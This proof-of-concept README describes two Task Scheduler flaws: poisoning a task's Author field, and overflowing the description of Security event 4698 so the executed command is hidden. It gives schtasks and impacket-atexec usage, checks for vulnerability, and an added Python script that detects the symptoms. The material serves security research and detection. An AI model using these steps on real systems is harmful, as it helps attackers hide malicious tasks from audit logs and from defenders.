By Ruben Enkaoua and Cymulate
Original Blog: Task Scheduler New Vulnerabilities
Two new Defense Evasion techniques have been discovered.
The first vulnerability affects the task metadata and the Security Event Log entry 4698 ("A scheduled task was created"): an attacker can create a task from an XML file and poison its "Author" entry with arbitrary data.
The second vulnerability leverages an unbounded buffer in the "Author" task metadata. The value is passed on to the Windows Event Log and overwrites the whole 4698 event description.
The exploit can also be triggered remotely by patching the Author entry in the XML task definition that impacket-atexec sends over RPC.
Prerequisites
- Batch Logon rights on the task principal for the task to run (otherwise the metadata / event log is still poisoned or overwritten, but the task won't run)
- The password of the task principal, if the user creating the task is not an admin or doesn't hold the SeImpersonate privilege
- The security policy "Audit Other Object Access Events" is enabled (otherwise event 4698 is not written at all)
Remote
# Replace the original impacket-atexec script with the uploaded script, and run it with the original arguments
# To poison the log with a fake Author entry, change the buffer in the XML file to the desired value. Example: Microsoft Corporation.
impacket-atexec [[domain/]username[:password]@]<targetName or address> command

Task Poisoning (Metadata / Event Log)
# Create the task from the PoC XML, then check whether the INJECTED-DATA author name has been set in the task description
schtasks /create /tn poc /xml poc-poisoning.xml /ru <username> /rp <password> /f
# Check whether the data has been injected by querying the task. If the author name is INJECTED-DATA, the target is vulnerable
schtasks /query /tn poc /xml | findstr /i author

Task Event Log Overflow
# Create the task from the PoC XML, then check whether the 3500+ byte payload has been injected into the 4698 Event Log
# If this log type is not enabled on your machine and you still want to test it, enable it in:
# Local Security Policy -> Advanced Audit Policy Configuration -> System Audit Policies - Local Group Policy Object -> Object Access -> Audit Other Object Access Events -> Select Success
schtasks /create /tn poc /xml poc-overflow.xml /ru <username> /rp <password> /f

Log Check
# Check the task log by running the following PowerShell command. If the <RegistrationInfo> tag contains a 3500-byte buffer but not the executed command and its arguments, the target is vulnerable.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698} | Where-Object { $_.Message -like '*poc*' } | Select-Object -First 1 | Format-List TimeCreated, Message

This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.
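The following is an added detection example written for this README; it is not part of the PoC or of the original Cymulate blog. It turns the two manual checks above (querying the task XML for the Author value, and reading the 4698 message for a RegistrationInfo block that carries a huge buffer but no command) into a script a defender can run over exported task definitions and collected 4698 messages. It assumes three things that are not stated on the page: a 4698 Message layout approximated from the real event text, a hypothetical 512-character threshold for an acceptable Author value, and that a task created by a user outside the \Microsoft\ folder normally carries DOMAIN\user as its Author, so a mismatch against the creating account in the event's Subject block is a poisoning signal. All sample inputs are constructed inline.

```python
"""Added detection example (not part of this PoC): inspect task XML exports and
Security event 4698 messages for the Author poisoning / overflow symptoms
described above. Sample inputs are constructed, not captured from a real host."""
import re
import xml.etree.ElementTree as ET

# Assumption: legitimate Author values (DOMAIN\user or a short vendor string) are
# short; 512 is a hypothetical threshold well below the ~3500-byte overflow payload.
MAX_AUTHOR_LEN = 512
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
AUTHOR_RE = re.compile(r"<Author>(.*?)</Author>", re.DOTALL)


def _strip_declaration(xml_text):
    # `schtasks /query /xml` emits a UTF-16 declaration; drop it so a str parses.
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)


def check_task_xml(xml_text):
    """Findings for a task definition exported with `schtasks /query /tn <name> /xml`."""
    findings = []
    root = ET.fromstring(_strip_declaration(xml_text))
    node = root.find(f"{TASK_NS}RegistrationInfo/{TASK_NS}Author")
    author = (node.text or "") if node is not None else ""
    if len(author) > MAX_AUTHOR_LEN:
        findings.append(f"oversized Author ({len(author)} chars)")
    if any(not ch.isprintable() for ch in author):
        findings.append("Author contains non-printable characters")
    if root.find(f"{TASK_NS}Actions/{TASK_NS}Exec/{TASK_NS}Command") is None:
        findings.append("task has no Exec/Command action")
    return findings


def check_4698_message(message):
    """Findings for the Message text of one Security event 4698.

    The event embeds the task XML after 'Task Content:'. Two symptoms are checked
    with regexes (the overwritten copy may not be well-formed XML): an oversized
    Author and a task content with no <Command>. A third check correlates the
    Author with the creating account from the Subject block (assumption: tasks
    created by a user outside \\Microsoft\\ normally carry DOMAIN\\user as Author).
    """
    findings = []
    m = re.search(r"Task Content:\s*(<\?xml.*)\Z", message, re.DOTALL)
    if m is None:
        return ["4698 message carries no Task Content"]
    content = m.group(1)
    author = AUTHOR_RE.search(content)
    author_val = author.group(1) if author else ""
    if len(author_val) > MAX_AUTHOR_LEN:
        findings.append(f"oversized Author in logged task content ({len(author_val)} chars)")
    if "<Command>" not in content:
        findings.append("logged task content lacks <Command> (actions missing or overwritten)")
    acct = re.search(r"Account Name:\s*(\S+)", message)
    dom = re.search(r"Account Domain:\s*(\S+)", message)
    task = re.search(r"Task Name:\s*(\S+)", message)
    if acct and dom and task and not task.group(1).lower().startswith("\\microsoft\\"):
        expected = f"{dom.group(1)}\\{acct.group(1)}"
        if author_val.casefold() != expected.casefold():
            findings.append(f"Author {author_val[:24]!r} does not match creating account {expected!r}")
    return findings


def _task_xml(author, with_action=True):
    # Constructed sample in the shape of a `schtasks /query /xml` export.
    action = ("<Actions><Exec><Command>cmd.exe</Command>"
              "<Arguments>/c whoami</Arguments></Exec></Actions>") if with_action else ""
    return ('<?xml version="1.0" encoding="UTF-16"?>'
            '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f"<RegistrationInfo><Author>{author}</Author></RegistrationInfo>{action}</Task>")


def _event_4698(account, domain, task_name, task_xml):
    # Constructed sample of a 4698 Message; the layout approximates the real one.
    return ("A scheduled task was created.\n\nSubject:\n"
            f"\tSecurity ID:\t\t{domain}\\{account}\n"
            f"\tAccount Name:\t\t{account}\n"
            f"\tAccount Domain:\t\t{domain}\n"
            "\tLogon ID:\t\t0x1F8C3\n\nTask Information:\n"
            f"\tTask Name:\t\t{task_name}\n"
            f"\tTask Content:\t\t{task_xml}")


CLEAN_TASK_XML = _task_xml("CORP\\alice")
OVERFLOW_TASK_XML = _task_xml("A" * 3500, with_action=False)
CLEAN_EVENT = _event_4698("alice", "CORP", "\\poc", CLEAN_TASK_XML)
POISONED_EVENT = _event_4698("alice", "CORP", "\\poc", _task_xml("Microsoft Corporation"))
OVERFLOW_EVENT = _event_4698("alice", "CORP", "\\poc", OVERFLOW_TASK_XML)

if __name__ == "__main__":
    for label, result in [("clean task xml", check_task_xml(CLEAN_TASK_XML)),
                          ("overflow task xml", check_task_xml(OVERFLOW_TASK_XML)),
                          ("clean 4698", check_4698_message(CLEAN_EVENT)),
                          ("poisoned 4698", check_4698_message(POISONED_EVENT)),
                          ("overflow 4698", check_4698_message(OVERFLOW_EVENT))]:
        print(f"{label}: {result or 'no findings'}")
```

Note that a poisoned Author such as "Microsoft Corporation" looks perfectly normal when the task XML is inspected on its own, which is why check_task_xml only flags size and non-printable content; the poisoning is only visible when the Author is correlated with the account that actually registered the task, which the 4698 Subject block records independently of the task content. Feed check_4698_message the Message property of each event returned by the Get-WinEvent query above to apply that correlation across the whole log.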